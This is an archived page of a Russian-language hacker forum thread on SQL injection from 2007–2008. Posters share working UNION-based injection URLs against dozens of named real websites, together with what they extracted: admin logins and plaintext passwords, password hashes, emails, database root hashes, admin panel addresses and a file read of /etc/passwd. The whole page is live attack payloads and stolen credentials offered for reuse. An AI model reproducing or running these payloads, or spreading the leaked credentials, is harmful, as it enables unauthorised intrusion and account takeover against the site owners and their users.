SQL Инъекции [Архив] - Страница 18

Ded MustD!e

30.12.2007, 06:27

http://www.propertysaleorrent.ie/

http://www.propertysaleorrent.ie/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9,0+from+admin/*

Админка: http://www.propertysaleorrent.ie/admin/

login: chamlis
pass: amalkne

http://www.chambers.ie/

http://www.chambers.ie/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin/*

Админка: http://www.chambers.ie/admins/

Админов аж 19 штук)))

» caoimhe : policy
» anna : letannain
» pauline : polexecpa
» grainne.oreilly : merrion
» RMM : goodRMM07
» ciara : watercress
» brett : bw325815
» susan : corppatrons
» marion : offmancsp
» richard : headcsp
» kate : projects
» barry : projects2
» Megan : commercial
» james.dunne : teddyBear
» jessica : jdempsey
» AMAS : amas07
» james : jkiernan
» annmcarroll : cahercon
» support : secureRMM07

http://www.explore.ie/

http://www.explore.ie/ireland/article.php?ID=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())/*

вывод в тайтле

http://www.andrewmoore.ie/

От этого сайта просто в восторге) долго искал, где же выводятся данные, оказалось в текстовом поле "Message:" в ссылке в ее параметре id=.

http://www.andrewmoore.ie/friend.php?id=-1+union+select+concat_ws(0x3a,username,password),2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+adm in/*

Админка: http://www.andrewmoore.ie/admin/

login: andrewmoore
pass: 194rew803

http://www.camping-ireland.ie/

http://www.camping-ireland.ie/caravan-parks/camping.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database())+from+admin/*

для тех, кто подберет колонки, админка: http://www.camping-ireland.ie/caravan-parks/login.html

5taY3r

30.12.2007, 12:51

http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*
2Loker
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,version(),user(),database()),0x71),0x71),2/**4.1.18:battle8i@localhost:battle8

Серенький

30.12.2007, 13:31

Saint-Sky Loker
Этого там нет... (не 6, а -6)
и тем не менее такая таблица с полями там есть... (попробуй другие названия таблиц и полей, и ощути разницу) и именно 6, а не -6, т.к. не будет видно отличий (отсутствует вывод таблицы). Так что я бы посоветовал посимвольный перебор, но в версиях < 4.1 не поддерживаются подзапросы...

ку? ;)

Серенький

30.12.2007, 14:26

Saint-Sky
я так думаю, это говорит о том, что обе эти таблицы есть, но из articles есть прямой вывод, а из users - нет.

http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,2+from+users/* - есть вывод статьи
http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,2+from+articles/* - есть вывод статьи

http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2+from+users/* - нет вывода инфы из таблицы
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,count(id)),0x71),0x71),2+from+articles/* - есть вывод инфы из таблицы

ElteRUS

30.12.2007, 16:33

http://www.rakurs.com/?news_id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,cast(v ersion()+as+binary),cast(database()+as+binary),cas t(user()+as+binary))/*

4.1.10a/rakurs/rakurs@localhost
-----------------------------------------------------------------------------

region-plus.tv

http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

5.0.41-community/region_base2/region_admin@localhost

http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,username,passwor d,email),4,5,6+from+forums_auth+limit+0,1/*

логин/хеш/мейл
io/6e5149991a779b92918203cc28078fbd/egik_israhell@pisem.net

http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,login,password), 4,5,6+from+newsmaker+limit+0,1/*

логин/хеш
BIG/3f604f988c27002e752fe43822e0741d

ElteRUS

30.12.2007, 17:48

http://www.ninsis.ru/newsview.php?id=-1'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6/*

4.1.22-log/dbninsis/root@localhost

http://www.ninsis.ru/newsview.php?id=-1'+union+select+1,concat_ws(0x2F,user,password),3, 4,5,6+from+mysql.user/*

root/*1B8D4E3A1CCB31B260088B7C11FD37BC79A35EE3

.Begemot.

30.12.2007, 20:33

sao.mos.ru

http://sao.mos.ru/?r=13&id=2376+union+select+0,1,2,3,4,5/*

http://sao.mos.ru/?r=13&id=2376+union+select+0,concat(USER(),VERSION(),DAT ABASE()),2,3,4,5/*

USER:sao1@chicken
VERSION:4.1.12
DATABASE:sao_pref

Есть таблица user
http://sao.mos.ru/?r=13&id=2376+union+select+0,1,2,3,4,5+from+user/*

ElteRUS

30.12.2007, 20:43

ruvr.ru

http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user())/*&p=30.12.2007

5.0.41-log/ruvr/root@localhost

все таблицы, где есть столбец “password”
http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat(table_name,0x3b,table_ schema)+from+information_schema.columns+where+colu mn_name=0x70617373776F7264/*&p=30.12.2007

user_auth;cacti
user;mysql
mybb_forums;phpbb_es
mybb_users;phpbb_es
punbb_users;phpbb_es
u_users;phpbb_es

http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,user,password) +from+mysql.user/*&p=30.12.2007

root/*F063FF97347E5D3E80B937BCA217308BF22D6E88

http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,username,passw ord,salt,email)+from+phpbb_es.mybb_users+limit+0,1/*&p=30.12.2007

логин/хеш/соль/мейл
adv/c6e9d9efbd87fdce20a3e3009294e109/S11C7Ufl/adv@adv.ru

Ded MustD!e

30.12.2007, 21:06

http://www.churchilltrust.com.au/

http://www.churchilltrust.com.au/content.php?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,userna me,password)+using+latin1),5,6,7,8,9,10,11+from+us ers/*

admin:4dm1n

http://www.mgnsw.org.au/

http://www.mgnsw.org.au/museums_and_galleries.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6/*

fobofob

30.12.2007, 21:40

Прикольный вывод )))
код:

http://www.auto-dom.ru/mlink.cgi?type=0&id=-50+union+select+cast(version()+as+binary),3/*

ElteRUS

30.12.2007, 23:44

transport-ua.com

http://www.transport-ua.com/news.php?rub=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,ve rsion(),database(),user())/*

5.0.45-log/transport/jsu75bfLnf@localhost

http://www.transport-ua.com/news.php?rub=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,lo gin,password,email_1)+from+users/*

логин/хеш/мейл
valentina/0af870403b703b423aa901e1220bbfcf/nzachesa@yahoo.com

http://www.transport-ua.com/news.php?rub=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,lo gin,password,email)+from+client/*

логин/пароль/мейл
89152/vladimir/admin@transport-ua.com

Ded MustD!e

31.12.2007, 02:07

http://www.mid.dj/ Официальный сайт министерства внутренних дел, судя по .dj - это Республика Джибути)))))) Для тех кто не знает - Восточная Африка=))))))

http://www.mid.dj/lireArticleid.php?id=-1+union+select+convert(concat_ws(0x3a,user(),versi on(),database())+using+latin1),2,3/*

http://www.booking.dj/ Сайт какого-то диджея...логин и пасс меня убивают....

http://www.booking.dj/artist.php?id=-4'+union+select+1,concat_ws(0x3a,login,pass),3,4,5 ,6+from+admins/*

admin:123

SWAT

31.12.2007, 12:06

http://www.cbdc.ca/programs.php?id=-10+union+select+1,VERSION(),3,4+from+accounts/*

http://www.asiandetours.com/programs.php?id=999999+union+select+1,concat(statu s,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25+from+users/*

http://www.equinection.org/programs.php?id=-36+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25/*

http://cae.nsu.ru/programs.php?id=-3+union+select+1,2,VERSION(),4,5,6,7,8/*

Neovild

31.12.2007, 13:30

embs.ru
http://www.embs.ru/web/index.php?razdel=2'+union+select+1,2,3,concat_ws(0 x3a,user(),version(),database()),5,6/*
megamost_web@localhost:4.1.22-lk-log:megamost_web

shark.ru
http://www.shark.ru/catalog.php?rid=5+union+select+1,concat_ws(0x3a,us er(),version(),database()),3,4,5,6,7/*
root@localhost:4.0.22-standard:sharkid
таблица mysql.user

4Dfx

31.12.2007, 13:46

www.housing.wisc.edu
http://www.housing.wisc.edu/resnet/news/story.php?id=-123+union+select+1,2,3,4,5,CONCAT(%20user,%20CHAR( 32,58,32),%20password),7,8,9,10+from+mysql.user/*
root : 1d7061767ec0f189

http://brtinfo.ksn.ru/
http://brtinfo.ksn.ru/dog.php?screen=1&id=123/**/union/**/select/**/1,2,3,4,5,6,CONCAT(name,CHAR(32,58,32),password)/**/from/**/users/*
admin : e9277b033bdfc26b6cdf2267b7014253 sealy : ad877328b782dfef7b2ba7b10e79eef3 Мелодия : 95f6870ff3dcd442254e334a9033d349 veronica : ab7743bc30fbdd14cf274a2ed03b9930 maria : a0369ff697bcc1611d339e39ad477c9a alexandra : 8db412f08820292e59a6c10370631520 Русская Династия : 43b8ffbd3cd91b25151fa9c68097649b Sasha : 45731940a11550b0612d12aafd5a6729 brtnata : 9d7484b81737d9918d1e308bfcfdf05f Primadonna : 3c00ab9ee5f47c8afc7ab4fc62342ef4 Viktor : 7a98fc5c5287db862768d5e9e5380fef bosfor : a29f03c4b066e2aadc9817adb35a0894 Доминика : 2116a1099b173a3d61601410b805b28b lasthope : 4779957a36d1f7d927298f7707fb606d ИСАЕВА : b6d1200efb7915b62916be4c8595c581 yablonka : ba1ac7252e8e07fe6aee121b2fcf4948 oksana : 2767ce1a4896448d1cd7c8b49bc89957 LenaP : a31a83e3eb0bc30c5e373ae45b532622 Наталия : 6bc5f38b8882c27245dd437c2e29ef5b test : 098f6bcd4621d373cade4e832627b4f6 Nusha : 1ea652db4702208fa73035bb4c9a24b2 Kapitan : 0456afab2a3c87fe92961cf0bfe8ccde Ясный Свет : 875ea2a56a80070fcf66d1fac123372b sotsvetie : 88d18f7ba1e9c421f09f8bba1ea3f0bc imperiara : e2dc73cf22fe3fa8d572eab643b978cf Simba : 443dbe8d20bd36682ade77fc586fcc73 Radji : 0dcd048b8ebba0b46ae2d3130e00fe52 deidra : 6915849303a3fe93657587cb9c469f00 AFL : cb3da2f071a17a4e1bcc43619a5117e8 va-bank : bfa19440b71e53cad2ba1d99d4d97e54 Fanya : f4f068e71e0d87bf0ad51e6214ab84e9 Lays : f74909ace68e51891440e4da0b65a70c Radomir : 77f20779238297b0e964329b9d7b6773 Julia : 14708b403d50ea76f2cd4bbf6f014717 Алена Максимова : 18d7b9cab3342ab05dc3e800f025f6e1 Katerinka : 1f3870be274f6c49b3e31a0c6728957f ergan90 : 056f2a457f9eebba4bfe63a87c306acd Knjajna : 47366718f5eb09ee06c492e8d1899943 Serafima : 2d805549d2ba121ee888858c2d87d65c Brendascompany : 98c7242894844ecd6ec94af67ac8247d Afonya : db33be7ccd422c041626f9f5d1f92f3a LAK90 : 69ee947bf183128691ab444b40b892dd Иштар : 997453931a4d571bcd990d075e3b6a0f Ярославна : b8839793688791092202e805e0a4406d dobrayavolya : 59f0891c050aa6139fb5189f47148ec4 arite : 766d3746cebb5b2c4b500c2432b2f843 sontheim : e10adc3949ba59abbe56e057f20f883e dede : b38846b63f94a514881e6abe3c24a65b IvanBG : 411147b363ecb44ab5bcb059dcbc77f9 artemchik : 85304e67de348d25787325d9dd74db9f gorda : c4f7fd15ccc210b90ddff2ac3125d9bc Самросс : c8ade10c1e16339c35e29e0a3c1321b5 trigubov : d0a6372c0c05714a1ba7f1c0739dbff5 Наталья : a5e4923c17aa0b0be39d630f68936495 alex-feigin : 4687b8298d476ec4582b52031c371373 tanyab : 766f0081408dd1691fc99860d9922c1b Jevgeni : 5b0b9645d5aa5c2c4dc2dd93374522c2 Ray : 4d6ca74f63a97f16c17697d5a2b7679a с.мышь : 5e6fb6bf8710de1cde956806367c0caf IngaRepina : 3e53ca3d4e69bc938071715257cc62b9 tatiana1946 : 5b08658c3b7f45f74745f8fe59934e7d Крисс : 3134c315b2e13325bf2edd30029a149a Берегиня : 42e4cfee1d6c68bbeecc3ef6278dcb83 Теплые Звезды : 35243b5e4cffc34dd3ab13887ce8482b uhhi : e0d724a043e6d40db562801a7d239a81 Elmar : 4de2f03eec858a0b1e75980aec5267c0 elpod123 : 059273779b2ffa92e46e85c25c2dc34b elndim : 5e64f98e6f9d6ead51999389d5f3f77b александр : ef58aa882272a9a14fd6af82432d3279 док : a984f36489d4987a1354ab1cba430a92 Anfisa : 1e3865c7c29235d7002d1bd727e0b3c2 Olga : 34660886ecff37ed7ef72fb3c7577b72 olkorn : 678101326aa0200ed440184ff62111ce

Ded MustD!e

31.12.2007, 15:45

http://www.reuniontv.re/

http://www.reuniontv.re/cocina_show.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5/*

Каймановы Острова:

http://www.marshalls.ky/ 5 мускул

http://www.marshalls.ky/CaymanPage.php?ID=-1'+union+select+1,2,concat_ws(0x3a,user(),version( ),database())/*

http://www.latintours.ky/ нажимаем Ctrl+A

http://www.latintours.ky/packages.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase())/*

http://www.purpledragon.ky/

http://www.purpledragon.ky/ContentPage.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5/*

ElteRUS

31.12.2007, 15:54

hct.ru

http://www.hct.ru/new/index.php?main=main_news&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*

5.0.41-log/hct/hct@jet.mplik.ru

http://www.hct.ru/new/index.php?main=main_news&id=-1+union+select+1,concat_ws(0x2F,name,password,emai l)+from+hct_admin_users+limit+0,1/*

логин/хеш/мейл
root/5d2e19393cc5ef67/igor@e-mail66.ru

159932

31.12.2007, 17:06

www.webkontora.net
http://www.webkontora.net/online_strip_poker.php?poker=table0&section=-11+union+select+1,2,3,login,5,password,7+from+acce ss+limit+0,1/*
admin:rjntyjr
де админка не знаю - там с любой несуществующей папки или файла идёт переадрисация на индекс
----------------------------------------------------------------------
http://www.webkontora.org/?section=1100+union+select+1,table_name,3,4+from+i nformation_schema.tables/*
5.0.41-community
----------------------------------------------------------------------
http://www.b2-projects.com/projects/?razdel=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables/*
5.0.41-community

~EviL~

31.12.2007, 17:27

www.dmsbg.com

http://www.dmsbg.com/projects_details_actual.php?id=-32+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(versio n(),0x3a,user(),0x3a,database())/*&start=0
4.0.27-log: dmsbg@localhost: DMS

ElteRUS

31.12.2007, 17:45

atlant.ws

http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

5.0.45-log/atlantgr_news/atlantgr_atlantu@localhost

Все таблицы, где есть столбец password
http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat(table_name,0x3b,table_sc hema),4,5,6,7,8+from+information_schema.columns+wh ere+column_name=0x70617373776F7264+limit+0,1/*

phpads_affiliates;atlantgr_adv
pmd_admin;atlantgr_firms
bb1_boards;atlantgr_forum
bb1_users;atlantgr_forum
dir_admins;atlantgr_top
dir_editors;atlantgr_top

http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat_ws(0x2F,username,passwor d,email),4,5,6,7,8+from+atlantgr_top.dir_admins+li mit+0,1/*

логин/хеш/мейл
admin/e008382c27a5c1cfc5b95131ec55ebc7/admin@atlant-group.com

http://news.atlant.ws/?set=news&mc=readfull&do=-1+union+select+1,2,concat_ws(0x2F,username,passwor d,email,icq),4,5,6,7,8+from+atlantgr_forum.bb1_use rs+limit+0,1/*

логин/хеш/мейл/уин
Atlant Group/e008382c27a5c1cfc5b95131ec55ebc7/atlant-group@yandex.ru/0

ElteRUS

31.12.2007, 18:31

4women.ru сайт знакомств

http://www.4women.ru/news/index.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*
5.0.41-Dotdeb_1.dotdeb.1-log/bob69_love/borey@localhost

http://www.4women.ru/news/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,name,passw,e mail)+from+bob69_love.love_ankets/*

логин/пароль/мейл ОЧЕНЬ много юзеров ))
Autor_test/magirus/info@spbcar.ru

159932

31.12.2007, 18:40

http://www.kraft.org.ua/prod.php?id=-17+union+select+1,2,table_name+from+information_sc hema.tables/*
5.0.41-community
----------------------------------------------------------------------
http://www.oksmodels.com/?module=show_details&model_id=-47+union+select+1,2,3,4,concat_ws(0x3a,login,pass, access),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+reg_users+limit+0 ,1/*
admin
bobak:290772

~EviL~

31.12.2007, 21:32

У меня, собственно, поддомен:
http://poveche.abv.bg/

http://poveche.abv.bg/kauza.php?id=-1+UNION+SELECT+1,2,3,4,concat(version(),0x3a,user( ),0x3a,database()),6,7,8,9,10/*&kauza=deca&type=1
4.0.27-log: poveche@localhost: bcaf

http://poveche.abv.bg/kauza.php?id=-1+UNION+SELECT+1,2,3,4,concat(id,0x3a,username,0x3 a,password),6,7,8,9,10+FROM+admins/*&kauza=deca&type=1
1: puhie: puhie05
2: bcaf: 11343910

Админка:
http://www.poveche.net/admin/login.php

С наступающим Новом Годом всех! :)

n0ne

31.12.2007, 22:47

ipodhacks.com

http://www.ipodhacks.com/article.php?sid=-2456+union+select+1,2,3,4,concat_ws(0x3a,uname,pas s),6,7,8,9,10,11+from+nuke_users

Тому, кто узнает что это за хэш - +мах x2 :)

Таблицы все те же что и в postnuke, хоть двиг немного и переписанный)

Grey

31.12.2007, 22:51

ipodhacks.com

Тому, кто узнает что это за хэш - +мах x2 :)

Таблицы все те же что и в postnuke, хоть двиг немного и переписанный)

http://www.ipodhacks.com/article.php?sid=-2456+union+select+1,2,3,4,concat_ws(0x3a,uname,pas s),6,7,8,9,10,11+from+nuke_users+limit+2,1

--->Тому, кто узнает что это за хэш
Не совсем понял что ты имел ввиду. Что за хеш? DES

blakespot:i3ecrwMoAq/xc:narnia

ElteRUS

01.01.2008, 20:03

ico.brush.ru

http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.1.11-beta/brush/brush@localhost

Таблицы, где есть столбец password
http://ico.brush.ru/?cl=-1+union+select+1,concat(table_schema,0x3b,table_na me),3,4,5,6,7,8,9+from+information_schema.columns+ where+column_name='password'+limit+18,1/*

alarms;shop_user
bkcbb;ashprojects_users
calibri;users
calibri;users_news
kapitalist;kapitalist_user
luna;admin
mantis;mantis_user_table
mugen;pro_user
mysql;user
nippon;LUM_User
portativ;shop_user
smsina;pro_user
smsina;users
smsina2;pro_user
spbauto;Member
spbauto;pandora_users
starz;mantis_user_table
tvoipolis;pro_user

http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,user,password),3,4 ,5,6,7,8,9+from+mysql.user/*

root/*E372920927493C3BCEA6654A14218A59970A3D11

http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,login,password),3, 4,5,6,7,8,9+from+luna.admin/*

логин/пароль
123alf/123alf

http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,name,password,emai l),3,4,5,6,7,8,9+from+nippon.LUM_User/*

имя/хеш/мейл
Andrey/0134baf25d72d0bdca3d0d1b75e548c1/ye@go.ru

159932

01.01.2008, 21:29

159932

01.01.2008, 23:11

http://www.avtoclub-ukr.com/?categoryid=-89+union+select+concat(login,0x3a,pass)+from+users/*
не подходят ((( да и вход какойто идиотский пасс и логин через ГЕТ идут
----------------------------------------------------------------------
http://www.myminsk.com/catalog/info.php?id=-3318+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2 ,3,4+from+information_schema.tables/*
5-ая
всё слишком запутано и щас сил нету искать ничо .. вот !

ElteRUS

02.01.2008, 01:12

petrovax.ru

http://www.petrovax.ru/news.php?cat=news&news_id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9/*

5.0.45-log/u19982/u19982@10.10.10.203

http://www.petrovax.ru/news.php?cat=news&news_id=-1+union+select+1,2,3,4,concat_ws(0x2F,username,use r_password,user_email,user_icq),6,7,8,9+from+phpbb poly_users+limit+1,1/*

логин/хеш/мейл/уин
jstudio/eb43619b759fe3f50043ed138306490a/vk@design-web.ru/

Tigger

02.01.2008, 14:29

http://www.trapeza.ru
http://www.trapeza.ru/news/?news=-325+union+select+1,concat(username,char(58),userpa ss),3,4,5,6,7,8+from+poll_user/*

login/hash/password

admin:d9d1b168eac8f197e0576b56cfc23ece:gfhjkm

~EviL~

02.01.2008, 15:12

Вот, добрался до клавиатуры, и теперь исполню свой долг:

www.cult.bg

http://www.cult.bg/ind_dotCult_full.php?id=-68+UNION+SELECT+1,2,concat(version(),0x3a,user(),0 x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23/*&PHPSESSID=b709562
4.1.22-log:root@localhost:cult
http://www.cult.bg/ind_dotCult_full.php?id=-68+UNION+SELECT+1,2,concat(user,0x3a,pass),4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FRO M+users+LIMIT+0,1/*&PHPSESSID=b709562
Hacko:breathe
...
http://www.cult.bg/ind_dotCult_full.php?id=-68+UNION+SELECT+1,2,concat(user,0x3a,password),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 +FROM+mysql.user+LIMIT+0,1/*&PHPSESSID=b709562
root:2fcd4de51aebc612::hq444

Ну что, еще раз с Новым 2008 Годом, всем успехов, радости, удачи, и пейте меньше! :D

Dimi4

02.01.2008, 15:40

Помогите, плз.
Я начинающий с скулями, тока количество полей подобрал а дальше чет неидет
http://natasha-fahim.com/project_en.php?id_product=-1+union+select+1,2,3,4,5,6,7,8/*

SWAT

02.01.2008, 15:58

пассы хз в какой кодировке
http://www.thesimszone.co.uk/extras/index.php?ID=-85+union+select+1,2,concat(username,0x3a,password) ,4,5,6,7,8,9+from+SiteLogins+limit+0,1/*

http://server47.dedicatedusa.com/~pamco/news2.php?id=-43+union+select+1,2,3,4,concat(username,0x3a,passw ord),6,7+from+admins/*

http://uktheatreschool.com/content/news2.php?id=-93+union+select+1,2+from+users/*

Ded MustD!e

02.01.2008, 21:59

http://www.nzaf.org.nz/

http://www.nzaf.org.nz/articles.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database())+from+admin/*

Осталось подобрать колонки в таблице admin...

Ded MustD!e

02.01.2008, 22:25

http://www.friarsgardens.co.nz/

http://www.friarsgardens.co.nz/garden.php?id=-1+union+select+1,concat_ws(0x3a,username,passwd),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47+from+users/*

admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

.Begemot.

02.01.2008, 22:30

unonamebel.ru

http://www.unonamebel.ru/shop/?dir=1+union+select+0,concat(USER(),0x3a,VERSION() ,0x3a,DATABASE()),2,3,4,5,6,7/*

USER:uno_mebel@localhost
VERSION:4.1.21-log
DATABASE:db_uno_mebel

5taY3r

02.01.2008, 22:58

www.welcomenet.ch
https://welcomenet.ch/onlinebooking/sites/angebotunddaten.php?hotelid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23+from+users/*4.0.18:root@localhost:welcodat

159932

02.01.2008, 23:04

http://www.olszanica.pl/index.php?id=-2+union+select+concat(login,0x3a,haslo)+from+ol_ad min+limit+0,1/*
5.0.32-Debian_7etch1-log
admin:21232f297a57a5a743894a0e4a801fc3
admin:admin

5taY3r

02.01.2008, 23:33

www.wichita.co.uk
http://www.wichita.co.uk/productdetails.php?id=-1+union+select+convert(concat_ws(0x3a,version(),us er(),database())+using+latin1),2,3,4/*4.1.10a-standard-log:admin@localhost:wichita

~EviL~

02.01.2008, 23:50

www.gramis.com

http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(version(),0x3a,user(), 0x3a,database()),5/*
4.1.22-log:gramis@localhost:gramis
http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(username,0x3a,password ),5+FROM+users+LIMIT+0,1/*
admin:babelfi67
Админка:
http://gramis.com/admin/index.php

http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(user_id,0x3a,username, 0x3a,user_password,0x3a,user_icq),5+FROM+phpbb_use rs+LIMIT+1,1/*
2:admin:f7c2d7fc1be27fcb6fc6d6dace13525e:::babelfi 67
Вход на форум:
http://www.gramis.com/phpbb/login.php

fobofob

03.01.2008, 00:35

интересная скуль;)

код:

http://angara.ur.ru/?page=serv&id=-1014+union+select+1,2,concat(table_schema,0x3a,tab le_name,0x3a,column_name),4+from+information_schem a.columns+where+column_name+like+0x257061737325+li mit+0,1/*

админских таблиц 116!!! шт.
Кому интересно,делайте выводы ;)

Tigger

03.01.2008, 01:42

http://www.yuldash.com/tg/index.php?id=26096+union+select+1,2,3,4,5,6,7/*&q=mes

Дальше уж сами...уже поздно и мне лень)) Может потом сделаю))

Ищите видимые поля нежи))

ZAMUT

03.01.2008, 02:53

versii.com.ua
http://versii.com.ua/telegraf/print.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9/*5.0.45-log:versii@localhost:versii

Админка:
http://versii.com.ua/admin/

je0n

03.01.2008, 03:00

http://www.trinidadexpress.com/index.pl/article_news?id=161245965+UNION+SELECT+1,version() ,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32

4.0.27-standard-log
csite01@AdServNode1

непонятная админка:
http://admin.trinidadexpress.com/
логин:пароль
carlos:carlos

А®ТеS

03.01.2008, 03:18

MySQL Injection:
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,concat(user,password,host),3,4,5, 6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABA SE()),15,16+FROM+mysql.user/*
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,2,3,4,5,LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),7,8,9,10,11,12,13, 14,15,16/*
http://www.catltd.ru/prices.html?cg=-1+UNION+SELECT+1,2,3,4,USER(),6,7/*
БД 4, а жаль. Таблицы с лету подобрать не удалось. Если кто будет ковыряться, плиз отпишитесь о результатах :).

MsSQL Injection:

http://www.goodmoves.org.uk/findajob/findajobdet.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES)--

~EviL~

03.01.2008, 03:45

www.big6.com

http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(version(),0x3a,user(),0x3a, database()),2,3,4,5/*
5.0.37-log:big6@localhost:big6

Интересные таблицы:
wp_users
poll_user
customers
blog_users

Т.к. сейчас слишком поздно, какие из них фальшивые разбираться не стал:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(ID,0x3a,user_login,0x3a,use r_pass,0x3a,user_email),2,3,4,5+FROM+wp_users+LIMI T+1,1/*
2:sue:e7e9ec3723447a642f762b2b6a15cfd7:sue_wurster @big6.com::bella
...
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(user_id,0x3a,username,0x3a, userpass),2,3,4,5+FROM+poll_user/*
1:admin:d158b1d234953b66bfc119f17f800b7b::big6php
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(customers_id,0x3a,customers _email_address,0x3a,customers_password),2,3,4,5+FR OM+customers/*
1:root@localhost:d95e8fa7f20a009372eb3477473fcd34: 1c::1cpassword

P.S. С blog_users все то же самое, что и с wp_users =)

Ded MustD!e

03.01.2008, 08:28

http://www.nram.org.nz/

http://www.nram.org.nz/record.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26+from+USERS+limit+0,1/*

SWAT

03.01.2008, 09:05

http://www.blogi.moje.pl/kategor.php?id_kategori=-1+union+select+1,VERSION(),3,4,5,6,7/*

http://tibiacz.com/kategorie_predmet.php?kat=-1+union+select+1,2,3,4,concat_ws(0x203a20,table_na me,column_name),6,7,8,9,10,11+from+information_sch ema.columns/*

http://www.cytaty.pl/wyslij.php?numer=0+union+select+1,VERSION(),3,4,5, 6/*

http://opisygg.szabloniki.com/index.php?pokaz_opis=-3871+union+select+1,VERSION(),3,4,5,6/*

http://www.ggopis.info/opis.php?id=0+UNION+SELECT+1,2,3,4,5,6,7/*

http://www.foto.oaza.pl/pokaz.php?strona=1&id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*

n0ne

03.01.2008, 12:40

moblog.co.uk

